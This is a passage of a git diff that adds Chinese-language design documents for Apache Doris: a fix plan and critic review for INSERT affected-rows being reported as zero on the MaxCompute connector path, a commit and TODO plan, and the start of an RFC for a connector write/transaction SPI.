!= null` 时调 `writeOps.finishInsert(...)`。事务模型下 `insertHandle` 恒为 null(handle 仅在 `beforeExec()` 的 JDBC 分支创建,而事务模型在 `:109-113` 早退),整段被跳过,`loadedRows` 永不赋值。 + - `loadedRows` 字段定义于 `AbstractInsertExecutor.java:69`(`protected long loadedRows = 0;`)。事务模型下,BE 的 MaxCompute sink 只通过 `TMCCommitData.row_count` 上报行数,从不更新 `num_rows_load_success`(DPP_NORMAL_ALL),故 `AbstractInsertExecutor.java:221-222` 取回 0,`loadedRows` 停在默认 0。 + - 下游 `BaseExternalTableInsertExecutor.java:197/201/203` 用 `loadedRows` 设 `setOk` / `setOrUpdateInsertResult` / `updateReturnRows` → 全部为 0。 + - legacy 基线 `MCInsertExecutor.java:74-78`:`doBeforeCommit()` 在 `finishInsert()` 之外还有 load-bearing 的一行 `loadedRows = transaction.getUpdateCnt();`。翻闸 restructure 只镜像了 `finishInsert` 的等价物(`connectorTx.commit` 经 txn manager),漏镜像 `loadedRows` 赋值。 + - 历史误判:`plan-doc/tasks/designs/P4-T05-T06-cutover-design.md:114`(W-c / gap G2)称 `doBeforeCommit ... → null for MC ⇒ correctly skipped`,把"跳过 doBeforeCommit"当作正确——本设计显式推翻该结论(见 Risk)。 + +- **Design**: 在 `PluginDrivenInsertExecutor.doBeforeCommit()` 的事务模型分支回填 `loadedRows`,镜像 legacy 可观察行为。 + - 不扩展任何 SPI:`getUpdateCnt()` 全链路已实现且仅差调用方 —— `ConnectorTransaction.getUpdateCnt()`(default,`fe-connector-api/.../ConnectorTransaction.java:96`)→ `MaxComputeConnectorTransaction.getUpdateCnt()`(`fe-connector-maxcompute/.../MaxComputeConnectorTransaction.java:158-160`,= `sum(TMCCommitData.getRowCount())`)→ 经 `PluginDrivenTransaction.getUpdateCnt()`(`PluginDrivenTransactionManager.java:183-184`)暴露 → `Transaction.getUpdateCnt()`(`Transaction.java:65` default)。`transactionManager.getTransaction(long)` 已声明 `throws UserException`(`TransactionManager.java:30`),与 `doBeforeCommit()` 现有签名 `throws UserException` 兼容。 + - 通用插件层修法,keyed on `connectorTx != null`(SPI 事务模型),非 hardcode maxcompute —— 任何未来事务模型 connector 自动受益;`connectorTx == null` 的 JDBC/auto-commit 路径保持原状(沿用 coordinator/DPP_NORMAL_ALL 取到的 `loadedRows`,与 legacy JdbcInsertExecutor 一致,不回填)。 + - 镜像 legacy 的 mirror 方式:legacy 用 `(MCTransaction) transactionManager.getTransaction(txnId)` 取 txn 再 `getUpdateCnt()`;翻闸已持有 `connectorTx` 字段且 `txnId == connectorTx.getTransactionId()`。两种等价取法:(a) 直接 `connectorTx.getUpdateCnt()`(`connectorTx` 是 executor 现有字段,最少耦合,无需 throws/lookup);(b) `transactionManager.getTransaction(txnId).getUpdateCnt()`(与 legacy 取法逐字一致,但引入 `throws UserException` 的 lookup)。推荐 (a):`connectorTx` 已在手、语义等价、不引入可失败的 manager lookup,改动最小;最终值与 legacy 一致(同一 `TMCCommitData.row_count` 累加链)。 + - 现有 `if (writeOps != null && insertHandle != null)` 的 `finishInsert` 分支不动(JDBC handle 模型仍需);新增逻辑作为事务模型独立分支。 + +- **Implementation Plan**: 逐文件逐方法 + - [fe-core] `fe/fe-core/.../insert/PluginDrivenInsertExecutor.java` `doBeforeCommit()`(:146-150):在现有 `finishInsert` guard 之外,新增事务模型回填分支 —— `if (connectorTx != null) { loadedRows = connectorTx.getUpdateCnt(); }`。两分支互斥(`connectorTx != null` ⇔ `insertHandle == null`),顺序无关;`loadedRows` 继承自 `AbstractInsertExecutor`(可直接赋值)。无新增 import(`ConnectorTransaction` 已 import 于 :30)。 + - 不改 fe-connector-maxcompute / fe-connector-api / be / thrift —— `getUpdateCnt()` 链路全已就绪,本 issue 纯 fe-core 一处赋值。 + +- **Risk**: + - 回归风险:极低。仅在 `connectorTx != null` 分支新增一次纯读取赋值;`getUpdateCnt()` 是无副作用的累加器读取(`commitDataList` 求和),在 `doBeforeCommit()`(commit 前、BE 回传 commitData 之后)调用时点正确,与 legacy 一致。`connectorTx == null` 的 JDBC/ES 路径字节级不变。 + - 对其他连接器/插件影响:正向。修法 keyed on `connectorTx`,任何事务模型 connector 通用;非事务模型不触达。无 hardcode maxcompute。 + - keep 集:本改动在翻闸侧 `PluginDrivenInsertExecutor`(SPI 路线 keep),不触碰 legacy `MCInsertExecutor`/`MCTransaction`(removal 集,batchD 将删)。需推翻历史决策:`P4-T05-T06-cutover-design.md:114` 的 "doBeforeCommit ... correctly skipped" 结论 —— 本设计显式标注该结论错误(它只覆盖"能否写成功",漏了"写成功后报告的行数",`loadedRows` 是独立于 G1–G5 的被遗漏 gap)。建议在 deviations-log / decisions-log 补一条更正记录(文档侧,非本 commit 代码范围)。 + - checkstyle / import-gate:无新 import,无 wildcard,单行赋值符合既有风格;不引入跨模块依赖(`connectorTx.getUpdateCnt()` 走已 import 的 SPI 接口)。 + +- **Test Plan**: + - UT(放 fe-core):扩 `fe/fe-core/src/test/java/org/apache/doris/nereids/trees/plans/commands/insert/PluginDrivenInsertExecutorTest.java`。复用现成 `newUnconstructedExecutor()`(Mockito CALLS_REAL_METHODS + Objenesis)+ `Deencapsulation` 注字段的范式。在内部 `StubConnectorTransaction` 加一个可返回固定行数的 `getUpdateCnt()` override(覆盖 SPI default)。新增 `doBeforeCommitBackfillsLoadedRowsFromUpdateCnt`:注入 `connectorTx = StubConnectorTransaction(returns N)`,调 `exec.doBeforeCommit()`,断言 `Deencapsulation.getField(exec, "loadedRows") == N`(编码 WHY:事务模型下 affected rows 必须取自 connector txn 的 getUpdateCnt,而非默认 0)。可补一条 `doBeforeCommitLeavesLoadedRowsForHandleModel`:`connectorTx == null` + 预置 `loadedRows`,断言 `doBeforeCommit()` 不覆盖(JDBC 路径不回填)。该 UT 不需 fe-core 之外依赖。 + - E2E:沿用 `regression-test/suites/external_table_p2/maxcompute/write/test_mc_write_insert.groovy`(gated by `enableMaxComputeTest`)。当前仅用 `order_qt_*` 验数据,无 affected-rows 断言。在 Test 1 的 `INSERT INTO ${tb1} VALUES (...3 行...)` 后捕获 affected rows(如 `def res = sql "INSERT ..."; assertEquals(3, res[0][0])` 或检查 SHOW INSERT RESULT / returnRows),断言点 = 写入行数 N 而非 0;并对 `INSERT ... SELECT`(Test 2)同样断言 N>0。断言点直击本回归:数据写对(order_qt 已保证)且行数报告正确。 + - 守门:改 fe-core 带 `-pl :fe-core -am`;本 issue 独立 commit(只动 `PluginDrivenInsertExecutor.java` + 该 UT)。 + +**Open questions**: 回填取法二选一:推荐 (a) connectorTx.getUpdateCnt()(字段已在手、无 throws、最小改动);(b) transactionManager.getTransaction(txnId).getUpdateCnt() 与 legacy 取法逐字一致但引入 UserException lookup。两者最终值等价,需 owner 拍板风格偏好。 · 是否同步补 deviations-log/decisions-log 一条更正,推翻 P4-T05-T06-cutover-design.md:114 'doBeforeCommit correctly skipped' 的历史结论(文档侧,非本代码 commit 范围)。 · E2E affected-rows 断言的具体取值方式(sql 返回的 res[0][0] vs SHOW INSERT RESULT vs returnRows)需按 regression 框架对 external INSERT 的实际返回形态确认;gated by enableMaxComputeTest,需真 MC 环境跑。 + +#### 🔎 对抗 critic — verdict: `sound` + +**需修正(corrections)**: +- Minor imprecision in the Root Cause's claim that legacy 'doBeforeCommit() 在 finishInsert() 之外还有一行 loadedRows = transaction.getUpdateCnt()'. Verified the ORDER in legacy MCInsertExecutor.java:75-78 is: getTransaction -> `loadedRows = transaction.getUpdateCnt()` (line 76) THEN `transaction.finishInsert()` (line 77). i.e. legacy reads the count BEFORE finishInsert commits. The fix's recommended approach (a) reads `connectorTx.getUpdateCnt()` in doBeforeCommit BEFORE PluginDrivenTransactionManager.commit() (called later in onComplete:105). Order is preserved — but note getUpdateCnt() reads commitDataList which is independent of commit(), so order is immaterial here; the design's 'order 无关' claim is correct. No behavioral error, just confirming the mirror is faithful. +- The design says approach (b) `transactionManager.getTransaction(txnId).getUpdateCnt()` is 'with legacy 取法逐字一致'. Not quite literal: legacy casts to `(MCTransaction)` and calls the concrete getUpdateCnt; the SPI path returns a `PluginDrivenTransaction` whose getUpdateCnt delegates to connectorTx (PluginDrivenTransactionManager.java:183-184). Semantically equivalent, but (b) is NOT a byte-for-byte mirror. This does not affect the recommendation — (a) is the right choice and the design picks it — but the '逐字一致' characterization of (b) is slightly overstated. + +**遗漏(gaps)**: +- E2E affected-rows capture shape unverified. The design proposes `def res = sql "INSERT ..."; assertEquals(3, res[0][0])`, but no existing external-table write suite (hive/iceberg/mc) uses this pattern — they all verify via `order_qt_*` on a follow-up SELECT. Whether the Doris regression `sql` helper returns INSERT affected-rows as `res[0][0]` (vs. needing `SHOW INSERT RESULT` / a JDBC updateCount path) is unconfirmed in-repo; implementation should pin the exact accessor before claiming the E2E asserts the regression. This is a test-mechanics gap, not a design flaw. +- Multi-statement / multi-fragment accumulation not explicitly covered by the proposed UT. The real value comes from summing N `TMCCommitData.row_count` fed by multiple BE fragment reports; the proposed StubConnectorTransaction returns a single fixed N, so it does not exercise the `commitDataList.stream().sum()` accumulation path (that lives in MaxComputeConnectorTransaction, in fe-connector-maxcompute, which the fe-core UT cannot reach). E2E Test 4 (multi-batch, 3 separate INSERTs of 1 row each) is the only place real accumulation across the feed path is exercised, and the design only proposes asserting Test 1/Test 2 — adding an affected-rows assertion to Test 4 would close this. +- Design does not state whether `filteredRows` should also be backfilled. It correctly mirrors legacy MCInsertExecutor (which only sets loadedRows), and MC never populates DPP_ABNORMAL_ALL so filteredRows legitimately stays 0 — but the design should explicitly note this as an intentional non-change for completeness, since `afterExec`/`setOk` also report a filtered count. +- No mention of the empty-insert path. Verified independently it is safe (empty insert skips executeSingleInsert entirely, so doBeforeCommit never runs and loadedRows=0 is correct), but the design's risk section should have named it since `beginTransaction`/`connectorTx` are skipped there. + +**额外风险**: +- Strict-mode interaction is benign but undocumented. AbstractInsertExecutor.checkStrictModeAndFilterRatio (line 232-246) runs in executeSingleInsert BEFORE onComplete->doBeforeCommit, so it evaluates with loadedRows still 0. For MC this is harmless (filteredRows=0 too, so the ratio guard `filteredRows > ratio*(filteredRows+loadedRows)` is `0 > 0` = false). The backfill happening afterward cannot retroactively affect the strict-mode check — which matches legacy exactly. Worth a one-line note in the design so a future reader doesn't 'fix' the ordering and accidentally make the filter-ratio denominator non-zero. +- getUpdateCnt() is read off connectorTx without holding the synchronized lock that addCommitData/commit use (MaxComputeConnectorTransaction.addCommitData synchronizes on `this`, but getUpdateCnt streams commitDataList unsynchronized). At doBeforeCommit time all BE fragment reports have completed (coordinator.join returned) so no concurrent addCommitData is in flight — same as legacy MCTransaction.getUpdateCnt which is also unsynchronized. Low risk, but it relies on the join->doBeforeCommit happens-before edge; if a future change moves commit-data feed off the join path this read could race. Pre-existing in legacy, not introduced by this fix. +- If a future SPI transaction-model connector returns a stateful ConnectorTransaction but does NOT override getUpdateCnt(), the backfill will silently write 0 (SPI default returns 0) — re-introducing the exact symptom for that connector with no fail-loud. The fix is generic and correct for MC, but the 'any future transaction-model connector automatically benefits' claim is conditional on that connector implementing getUpdateCnt(). Worth flagging in the connector-author contract / SPI javadoc rather than relying on the default. +- The design proposes a doc correction to P4-T05-T06-cutover-design.md:114 and decisions-log but scopes it out of the code commit. Confirmed line 114 does say 'doBeforeCommit ... null for MC => correctly skipped' and is genuinely wrong about loadedRows. Risk: if the doc correction is deferred and forgotten, the stale 'correctly skipped' rationale could mislead a future reviewer into re-removing the backfill during batchD legacy cleanup. Recommend bundling the deviations/decisions-log note into the same change. + +--- + +## 3. 守门 / commit 计划 + +| issue | commit 标题(建议) | 守门(模块) | +|---|---|---| +| FIX-READ-DESC | `[P4-T06d] 读路径 TableDescriptor 类型混淆 — 补 buildTableDescriptor override 产 TMCTable` | mvn ... -pl :fe-connector-maxcompute ... + import-gate | +| FIX-READ-SPLIT | `[P4-T06d] byte_size split size sentinel — 默认 split 回填 size=-1` | mvn ... -pl :fe-connector-maxcompute ... + import-gate | +| FIX-DDL-ENGINE | `[P4-T06d] 无 ENGINE 的 CREATE TABLE — paddingEngineName/checkEngineWithCatalog 识别 PluginDriven` | mvn -f .../fe/pom.xml -pl :fe-core -am ... test-compile + checkstyle:check | +| FIX-DDL-REMOTE | `[P4-T06d] DDL 远端名解析 — CREATE/DROP TABLE 用 getRemoteName/getRemoteDbName 再发 connector` | mvn -f .../fe/pom.xml -pl :fe-core -am ... test-compile + checkstyle:check | +| FIX-PART-GATES | `[P4-T06d] partitions() TVF + SHOW PARTITIONS analyze 网关 + 分区元数据 override` | mvn -f .../fe/pom.xml -pl :fe-core -am ... test-compile + checkstyle:check | +| FIX-WRITE-ROWS | `[P4-T06d] INSERT affected rows 恒 0 — doBeforeCommit 补 loadedRows=getUpdateCnt()` | mvn -f .../fe/pom.xml -pl :fe-core -am ... test-compile + checkstyle:check | + +## 4. 合并 TODO(执行时勾选) + +**阶段 1 — 恢复读路径可用 (gate live SELECT)** +- [ ] FIX-READ-DESC — MaxComputeConnectorMetadata 缺 buildTableDescriptor override,导致翻闸后 toThrift 走 null 兜底产 SCHEMA_TABLE(无 mcTable),BE file_scanner 无条件 static_cast 到 MaxComputeTableDescriptor 类型混淆崩溃;修法为在 MC connector 补 override 产出 MAX_COMPUTE_TABLE+TMCTable,并把 endpoint/quota/properties 透传进 metadata。 + - [ ] test: fe-connector-maxcompute UT: MaxComputeConnectorMetadata.buildTableDescriptor (新增,放 fe-connector-maxcompute/src/test) + - [ ] test: regression-test/suites/external_table_p2/maxcompute/test_external_catalog_maxcompute.groovy + - [ ] test: regression-test/suites/external_table_p2/maxcompute/test_max_compute_all_type.groovy + - [ ] test: regression-test/suites/external_table_p2/maxcompute/test_max_compute_partition_prune.groovy +- [ ] FIX-READ-SPLIT — byte_size split 在翻闸 connector 用 .length(splitByteSize) 回填 rangeDesc.size,丢失 legacy 的 -1 sentinel,使 BE 把 byte-size split 误判为 row-offset → 默认路径静默读出错误数据;改 MaxComputeScanPlanProvider.java:268 为 .length(-1) 恢复 sentinel。 + - [ ] test: fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/MaxComputeScanRangeTest.java (new UT) + - [ ] test: regression-test/suites/external_table_p2/maxcompute/test_external_catalog_maxcompute.groovy (default byte_size read path) +**阶段 2 — 恢复 DDL 可用** +- [ ] FIX-DDL-ENGINE — paddingEngineName/checkEngineWithCatalog 在 MC instanceof 分支后新增 PluginDrivenExternalCatalog 分支(keyed on getType()=="max_compute"→ENGINE_MAXCOMPUTE,经 helper 通用化),纯 fe-core 最小改动,镜像 legacy 自动补 engine=maxcompute 行为;须先于 Batch D 删 legacy MC 分支落地。 + - [ ] test: fe/fe-core/src/test/java/org/apache/doris/nereids/trees/plans/commands/info/CreateTableInfoTest.java (UT: paddingEngineName/checkEngineWithCatalog PluginDriven 分支) + - [ ] test: regression-test/suites/external_table_p2/maxcompute/test_max_compute_create_table.groovy (E2E: Test1/Test2/Test3 无 ENGINE 的 CREATE TABLE 翻闸态由 FAIL 转 PASS, qt_test*_show_create_table 断言) +- [ ] FIX-DDL-REMOTE — 在 PluginDrivenExternalCatalog 的 createTable/dropTable override 内先用 getRemoteName/getRemoteDbName 把本地名解析成 ODPS 远端真名再交给连接器,mirror legacy MaxComputeMetadataOps,纯 FE 改动、不扩 SPI、不动连接器。 + - [ ] test: fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenExternalCatalogDdlRoutingTest.java + - [ ] test: regression-test/suites/external_table_p2/maxcompute/test_max_compute_create_table.groovy +**阶段 3 — 恢复分区可见 (partitions TVF / SHOW PARTITIONS)** +- [ ] FIX-PART-GATES — 给 PluginDrivenExternalTable 加 isPartitionedTable/getPartitionColumns override(keyed on connector 的 partition_columns 声明),并在 PartitionsTableValuedFunction.analyze 双网关补 PluginDriven 分支,打通 T06c 已接好的 SHOW PARTITIONS / partitions() TVF BE handler;不删 Batch-D 红线分支。 + - [ ] test: external_table_p2/maxcompute/test_external_catalog_maxcompute + - [ ] test: external_table_p2/maxcompute/test_max_compute_schema + - [ ] test: external_table_p2/maxcompute/test_max_compute_partition_prune +**阶段 4 — 写回正确性 (affected rows)** +- [ ] FIX-WRITE-ROWS — 在 PluginDrivenInsertExecutor.doBeforeCommit() 的事务模型分支(connectorTx != null)补一行 loadedRows = connectorTx.getUpdateCnt(),回填翻闸丢失的 affected-rows,镜像 legacy MCInsertExecutor;getUpdateCnt 全链路已就绪,纯 fe-core 一处赋值。 + - [ ] test: external_table_p2/maxcompute/write/test_mc_write_insert +- [ ] 全部落地后 → 用户跑 live 验证矩阵(SELECT/分区表 SELECT/SHOW PARTITIONS/partitions() TVF/无 ENGINE CREATE TABLE/INSERT affected rows/DROP TABLE/DB) 全绿 → 解锁 Batch D + +## 5. 本批次外(其余存活发现, 待用户定) + +> 以下为 review 存活但**未纳入本批**的 major/minor; 不在本设计, 列此以免静默遗漏(fail loud)。 + +- **READ-P3 / CACHE-P1** (major/minor): FE 侧内部分区裁剪 + partition_values cache 丢失(退化为 connector 每查询直连 ODPS)。性能向, 待定。 +- **READ-P4** (major): datetime 谓词下推 ISO-8601 解析失败被静默吞 + 源时区取 endpoint region。 +- **READ-P5** (major): limit-split 优化忽略 `enable_mc_limit_split_optimization`(默认 OFF), 默认行为与 legacy 相反。 +- **READ-C6** (question): CAST 谓词下推语义与 legacy 不同(剥 CAST 下推 vs 保守不下推)。 +- **DDL-P4** (major): CREATE TABLE 列约束(auto-increment/聚合)校验被静默绕过。 +- **DDL-P2 / CACHE-P2/C3** (question): DROP DATABASE FORCE 级联不复刻(force 不转发)。 +- **WRITE-P2/P3, READ-C7/C8, REPLAY-P1, DDL-C5** (minor): block 上限硬编码 / isKey 标记 / split 缺字段 / post-commit 吞错 / editlog-cache 顺序反转 / IF NOT EXISTS 冗余 editlog。详见报告。 +- **READ-C9**: legacy NOT IN 取反 bug, 翻闸已修正 —— 回归用例须以**正确**语义为基线, 勿误判。 diff --git a/plan-doc/tasks/designs/connector-write-spi-rfc.md b/plan-doc/tasks/designs/connector-write-spi-rfc.md new file mode 100644 index 00000000000000..432f23588311d0 --- /dev/null +++ b/plan-doc/tasks/designs/connector-write-spi-rfc.md @@ -0,0 +1,205 @@ +# RFC:连接器写/事务 SPI(Connector Write/Transaction SPI) + +> 设计文档(design-doc-first)。日期 2026-06-06。Scope = **C(写-SPI RFC 先行)**,P4 启动决策。 +> 锚定 3 个现存写者 **maxcompute / hive / iceberg**,前瞻 **paimon**(今读后写)。 +> 决策方向(用户签字):**A** 连接器事务为单一源·桥接;**B1** commit 载荷 opaque bytes;**C1** block-id 窄 callback seam;**D** 覆盖 INSERT/DELETE/MERGE、defer procedures。 +> 事实底座:[research/connector-write-spi-recon.md](../../research/connector-write-spi-recon.md)(3 写者深挖 + 现存 SPI + leak 锚点)。 +> 本文是设计;**实现待用户批准本 RFC 后**按 §12 TODO 分阶段落地。 + +--- + +## 1. Goals + +1. 把 fe-core **通用写编排**(`Coordinator` / `LoadProcessor` / `FrontendServiceImpl` / `BaseExternalTableInsertExecutor` / `TransactionManager`)完全**多态化**——消除全部 `instanceof MCTransaction/HMSTransaction/IcebergTransaction` 与 concrete cast(leak 见 §recon-6)。 +2. 定义连接器侧**写/事务 SPI**:maxcompute(P4)/iceberg(P6)/hive(P7) 将实现它;**paimon(P5) 零 SPI 改动**即可接入。 +3. 覆盖 **INSERT / DELETE / MERGE** DML + 事务生命周期 + **BE→FE commit 载荷回调** + maxcompute **block-id seam** + **写-plan-provider**。 +4. **保 BE 契约不变**:各 `T{MaxCompute,Hive,Iceberg}TableSink` 与 BE→FE commit thrift(`TMCCommitData`/`THivePartitionUpdate`/`TIcebergCommitData`)一字不动。 +5. 复用 P0 既有面(`ConnectorWriteOps`/`ConnectorTransaction`/`PluginDrivenInsertExecutor`/`PluginDrivenTransactionManager`),**扩展不重造**;新增方法**default-only**(D-009,不破签名)。 + +## 2. Non-goals + +- iceberg **PROCEDURES**(`rewrite_data_files`/`expire_snapshots`)→ 归 `ConnectorProcedureOps`(E2)/**P6**;本 RFC 只保证不预排除(`RewriteDataFileExecutor:61` 不在本 RFC 解)。 +- hive **行级 ACID delete/update/merge**:今未实现,越界。 +- **各连接器代码搬迁**本身:在 P4/P6/P7 执行期做;本 RFC 只定它们要对的 SPI 靶。 +- **BE 侧改动**:零。 +- 多语句事务隔离/只读传播:三者皆单语句 per-DML,暂不纳入。 + +## 3. Constraints / context + +- **import-gate**:禁 connector→fe-core;SPI 必须落 `fe-connector-api`/`fe-connector-spi`。 +- **classloader 隔离**:fe-core 不能引用连接器类 → 一切耦合走 SPI。 +- **两层事务抽象**并存且需桥接:fe-core `Transaction`(commit/rollback,`Coordinator` 持有它) ⟷ SPI `ConnectorTransaction`(getTransactionId/commit/rollback/close,连接器实现)。`PluginDrivenTransactionManager`(P0-T11 已加 `begin(ConnectorTransaction)`) 是桥接点。 +- **default-only**(D-009):所有新增 SPI 方法带 default(no-op/throws/empty),不破现有连接器。 + +## 4. Architecture overview + +``` + ┌─────────────────────────── fe-core 通用写编排(多态后)────────────────────────────┐ + INSERT/DELETE/ │ BaseExternalTableInsertExecutor → TransactionManager.begin()/commit()/rollback() │ + MERGE 命令 │ Coordinator / LoadProcessor: txn.addCommitData(byte[]) ← B1(替 3 处 cast) │ + │ FrontendServiceImpl: txn.allocateWriteBlockRange(...) ← C1(替 mc instanceof) │ + │ PhysicalPlanTranslator: PluginDrivenTableSink ← E(替各 PhysicalXxxSink) │ + └──────────────┬───────────────────────────────────────────────────┬─────────────────┘ + 持有 fe-core Transaction(多态) 经 ConnectorWritePlanProvider 取 TDataSink + │ │ + ┌───────────────────────┴────────────┐ ┌─────────────────┴─────────────────┐ + │ PluginDrivenTransaction(fe-core) │ wraps & delegates │ 连接器模块(plugin,classloader 隔离)│ + │ implements fe-core Transaction │ ───────────────────▶ │ ConnectorWriteOps │ + │ → 委派 SPI ConnectorTransaction │ │ ConnectorTransaction │ + └──────────────────────────────────────┘ │ ConnectorWritePlanProvider │ + │ (maxcompute/iceberg/hive impl) │ + └─────────────────────────────────────┘ + 过渡期(W-phase):现存 fe-core MCTransaction/HMSTransaction/IcebergTransaction 直接 impl 新增的 + fe-core Transaction.addCommitData/allocateWriteBlockRange(适配到各自 typed update),先让通用层多态、 + 暂不搬类、不翻闸;之后各连接器在 P4/P6/P7 把逻辑迁入 plugin、走 PluginDrivenTransaction 桥。 +``` + +三处 seam:**B1** commit 载荷(§5.3)、**C1** block-id(§5.4)、**E** 写 sink(§5.5)。 + +## 5. SPI surface(APIs) + +### 5.1 事务模型(A)—— 桥接,非双轨 +- **SPI `ConnectorTransaction`**(既有,不改签名):`getTransactionId():long`、`commit()`、`rollback()`、`close()`。新增见 5.3/5.4。 +- **fe-core `Transaction`**(既有:`commit()`/`rollback()`):新增通用写回调(5.3/5.4),3 个现存 impl override。 +- **`PluginDrivenTransaction`**(fe-core,新):`implements Transaction`,wrap 一个 `ConnectorTransaction`,把 fe-core 侧 commit/rollback/addCommitData/allocateWriteBlockRange **委派**给 SPI 侧。`PluginDrivenTransactionManager.begin()` 产它。 +- **效果**:`Coordinator`/`LoadProcessor`/`FrontendServiceImpl` 只见 fe-core `Transaction` 多态;连接器只实现 `ConnectorTransaction`;桥在中间。 + +### 5.2 写操作(D)—— INSERT/DELETE/MERGE(既有面,微调) +`ConnectorWriteOps`(既有,JDBC 已实现 insert): +```java +boolean supportsInsert()/supportsDelete()/supportsMerge(); // default false +ConnectorWriteConfig getWriteConfig(session, tableHandle, columns); // default throws +ConnectorInsertHandle beginInsert(session, tableHandle, columns); // default throws +void finishInsert(session, ConnectorInsertHandle, Collection commitFragments); // default throws +void abortInsert(session, ConnectorInsertHandle); // default no-op +// delete / merge 同形(beginDelete/finishDelete/abortDelete, beginMerge/finishMerge/abortMerge) +``` +- `ConnectorInsert/Delete/MergeHandle`(opaque)承载连接器写态(ODPS session / iceberg txn+manifest builder / hive staging path)。 +- `finishX(..., Collection commitFragments)`:**承接 B1 累积的 commit 载荷**(见 5.3),连接器反序列化自己的 thrift 落元数据。 + +### 5.3 Commit 载荷回调(B1 = opaque bytes,核心机制) +**问题**:BE 写完每个 fragment 回连接器专有 typed 载荷(`TMCCommitData`/`THivePartitionUpdate`/`TIcebergCommitData`),现由 `Coordinator`/`LoadProcessor` concrete cast txn 调 `updateXxxCommitData(typed)`。 +**B1 设计**: +1. **SPI `ConnectorTransaction` + fe-core `Transaction` 各加**: + ```java + default void addCommitData(byte[] commitFragment) { /* no-op */ } + ``` +2. **bytes 内容 = 原 thrift 序列化**(`TSerializer` on 既有 `T*CommitData`/`THivePartitionUpdate`),连接器侧 `TDeserializer` 还原 → 零 BE 改动、保全富信息(iceberg delete-file/stats、hive S3-MPU、mc block 全留)。 +3. **fe-core 写结果桥**(**唯一**仍枚举 3 thrift 字段处,一个序列化 shim,非行为):`Coordinator`/`LoadProcessor` 收 BE 结果时,把当前非空的 `{hivePartitionUpdates|icebergCommitData|mcCommitData}` 之一 `TSerialize`→bytes,调多态 `transaction.addCommitData(bytes)`。**消除 3 处 txn cast**。 +4. **过渡期** 3 个 fe-core impl override `addCommitData`:`TDeserialize`→调各自既有 `updateXxxCommitData`。迁入 plugin 后由 `ConnectorTransaction` 实现。 +5. **finish**:fe-core 累积的 fragments 传 `finishInsert(..., commitFragments)`(或连接器在 addCommitData 时即累积,finish 触发落库——两种皆可,实现期定,倾向连接器内累积)。 +> Open-1(§10):序列化 shim 何时退休——待 BE 加通用 `connector_commit_data:list` 字段(未来,非本 RFC)即可消除最后这处枚举。本 RFC **fail-loud 登记**此 transitional shim。 + +### 5.4 Block-id seam(C1 = 窄 callback) +**问题**:`FrontendServiceImpl:3702` `((MCTransaction)txn).allocateBlockIdRange(sessionId,length)`——maxcompute 唯一写期 BE↔FE RPC。 +**C1 设计**:fe-core `Transaction` + SPI `ConnectorTransaction` 加**窄默认方法**: +```java +default boolean supportsWriteBlockAllocation() { return false; } +default long allocateWriteBlockRange(String writeSessionId, long count) { + throw new UnsupportedOperationException("write block allocation not supported"); +} +``` +- `FrontendServiceImpl` 改为:`if (txn.supportsWriteBlockAllocation()) return txn.allocateWriteBlockRange(sid, len); else ;`——**零 instanceof**。 +- **仅 maxcompute** override(其余连接器默认 false)。`writeSessionId` 为 opaque 连接器自定义串。 +- 不上升为方法族(拒 C2 过度泛化)、不留特例(拒 C3)。 + +### 5.5 写-plan-provider(E)—— 仿 scan +- 新 **`ConnectorWritePlanProvider`**(仿 `ConnectorScanPlanProvider`):连接器据 bound sink(target table/columns/partition spec/overwrite/writePath)产 **opaque `TDataSink`**(各自 `T*TableSink`);BE 不变。 + ```java + interface ConnectorWritePlanProvider { + ConnectorSinkPlan planWrite(ConnectorSession session, ConnectorWriteHandle handle); + } + // ConnectorWriteHandle: 承载 target table handle + columns + partition spec + overwrite + writeContext + // ConnectorSinkPlan: 包 opaque TDataSink(thrift) + ``` +- fe-core `*TableSink.bindDataSink()` 逻辑搬入连接器;`PhysicalPlanTranslator` 各 `visitPhysicalXxxTableSink` → 统一 `PluginDrivenTableSink`(仿 scan 收口)。 +- `Connector` 加 `default getWritePlanProvider()`(回 null→不支持写)。 + +### 5.6 paimon 前瞻校验 +paimon(P5) 写时:impl `ConnectorWriteOps`(insert,FILE_WRITE 形,似 iceberg manifest)+ `ConnectorWritePlanProvider`(产 paimon sink)+ `ConnectorTransaction`(commit 载荷走 B1 opaque bytes)。**无新 SPI**。MVCC 读已用 P0 `beginQuerySnapshot`。→ 设计对 paimon 闭合。 + +## 6. Data flow(INSERT 时序,多态后) +``` +1. InsertIntoTableCommand → BaseExternalTableInsertExecutor.beginTransaction() + → TransactionManager.begin() → (PluginDriven)Transaction(txnId) [记 GlobalExternalTransactionInfoMgr] +2. executor.beforeExec() → ConnectorWriteOps.beginInsert(session,tableHandle,cols) → ConnectorInsertHandle +3. PhysicalPlanTranslator → PluginDrivenTableSink ← ConnectorWritePlanProvider.planWrite() 产 TDataSink +4. Coordinator 下发 TDataSink;BE 写 + · maxcompute:BE→FE RPC → FrontendServiceImpl → txn.allocateWriteBlockRange() [C1] +5. BE 每 fragment 回 commit 载荷 → Coordinator/LoadProcessor: TSerialize→txn.addCommitData(bytes) [B1] +6. executor.doBeforeCommit() → ConnectorWriteOps.finishInsert(session,handle,fragments) → 连接器落元数据 +7. executor.onComplete() → TransactionManager.commit(txnId) → ConnectorTransaction.commit()/rollback() +8. 结果行数:txn.getUpdateCnt()(亦泛化为 default) +``` +DELETE/MERGE:2/6 换 beginDelete/finishDelete(iceberg:position-delete/RowDelta),其余同。 + +## 7. 三写者 → SPI 映射(证明抽象闭合) + +| SPI | maxcompute | hive | iceberg | paimon(后) | +|---|---|---|---|---| +| beginInsert→Handle | ODPS write session(writeSessionId) | staging path + ctx | iceberg Transaction + AppendFiles | BatchWriteBuilder | +| addCommitData(bytes) | TDeser `TMCCommitData` | TDeser `THivePartitionUpdate` | TDeser `TIcebergCommitData` | paimon commit msg | +| finishInsert | session.commit(msgs) | action queue + FS rename | Append/Replace/Overwrite.commit | TableCommit.commit | +| allocateWriteBlockRange | ✅ override | default(false) | default(false) | default(false) | +| beginDelete/Merge | unsupported | unsupported | ✅ RowDelta/position-delete | (后续) | +| WritePlanProvider→TDataSink | TMaxComputeTableSink | THiveTableSink | TIcebergTableSink/DeleteSink | paimon sink | +| commit/rollback | session commit/abort | FS+HMS commit / staging cleanup | txn.commitTransaction / discard | commit / abort | +| getWriteConfig type | CUSTOM | FILE_WRITE | FILE_WRITE | FILE_WRITE | + +## 8. fe-core 改动(通用层解耦清单) +| 站点 | 现状 | 改为 | +|---|---|---| +| 